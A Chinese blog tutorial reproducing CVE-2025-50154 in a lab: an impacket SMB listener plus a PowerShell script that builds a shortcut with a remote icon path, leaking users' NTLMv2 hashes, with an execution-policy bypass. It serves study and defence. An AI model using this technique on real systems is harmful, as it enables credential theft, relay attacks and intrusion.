深度复现CVE-2025-50154获取NTLM哈希

秋水5326

该漏洞简介：
该漏洞允许攻击者在没有任何用户交互的情况下提取 NTLM 哈希值，攻击者可以自动触发 NTLM 身份验证请求，从而实现离线破解或中继攻击以获得未经授权的访问。NTLM 是 Microsoft 的一系列身份验证协议，用于确认用户身份和保护网络通信。它通过直接的客户端-服务器“质询/响应”过程工作，服务器发出质询，客户端证明其身份，而无需通过网络传输实际密码。虽然 NTLMv2 受到保护，可以抵御彩虹表和传递哈希等预计算攻击，但捕获的哈希值仍然可以被利用。攻击者可能会尝试暴力破解它们离线或使用中继攻击，将窃取的哈希值传递给另一个服务以用户身份登录。如果被入侵的帐户具有提升的权限，这可能会很快导致权限升级和横向移动。即使在 Microsoft 针对该问题进行补丁后，安全研究员也找到了一种绕过它并仍然获得 NTLM 哈希的方法，证明威胁并未完全消除，这就是CVE-2025-50154，而它之前的漏洞是CVE-2025-24054。

1.1:原文链接：https://cymulate.com/blog/zero-click-one-ntlm-microsoft-security-patch-bypass-cve-2025-50154/

1.2:旧漏洞：-CVE-2025-24054

2.1:基础环境：Kali Linux
未打补丁的Windows 10

2.2:复现：Kali Linux启动impacket渗透组件，开启一个 SMB 服务器来侦听传入的 SMB 连接
1  ：impacket-smbserver：为对应的impacket渗透组件
2  ：share .：指将当前目录作为share共享
3  ：smb2support：开启SMB服务支持
然后在受害机执行如下PowerShell脚本，新建一个PowerShell脚本文件1.ps1，写入如下内容（注意替换为自己的Kali Linux IP地址，此处我的Kali Linux IP地址为192.168.48.129）：

# lnk文件的地址，若要复现请替换为自己的地址
$shortcutPath = "C:\Users\Divide\Desktop\lab.lnk"
# 目标程序的路径
$targetPath = "C:\Windows\System32\notepad.exe"
# 指定快捷方式使用的图标文件（.ico）的位置为远程地址，此处为关键点，只有设置为远程地址，才能让他访问我们开启的SMB服务器
$iconLocation = "\\192.168.48.129\share\icon.ico"


# 创建一个 Windows Script Host Shell 对象（通过 COM 组件 WScript.Shell）。  
# 这个对象提供了操作快捷方式、环境变量、执行程序等能力。  
# 将该对象赋值给变量$wShell，后续通过它来创建和管理快捷方式。
$wShell = New-Object -ComObject WScript.Shell
# 如果该路径已存在快捷方式，则会覆盖；如果不存在，则创建一个新的快捷方式对象
$shortcut = $wShell.CreateShortcut($shortcutPath)
# 设置快捷方式的“目标”属性，即点击快捷方式时要启动的程序路径
$shortcut.TargetPath = $targetPath
# 这里使用的是远程网络路径中的 .ico 图标文件
$shortcut.IconLocation = $iconLocation
# 对快捷方式对象的修改保存到磁盘中
$shortcut.Save()

Write-Output "Shortcut created at: $shortcutPath




将创建一个带有基于 SMB 的远程图标的 LNK（LNK就是快捷方式，带有一个图标）
运行它，通过查看资源管理器中的图标，我们将获得当前正在运行的用户打开 explorer.exe（资源管理器） 进程的 NTLMv2-SSP 哈希值。若PowerShell执行报错，执行如下命令输入y即可执行我们编写的PowerShell脚本

set-ExecutionPolicy RemoteSigned
y


当运行成功后，结果如下，成功获取到对应用户的hash值：

2.3:对应补丁及漏洞信息：https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054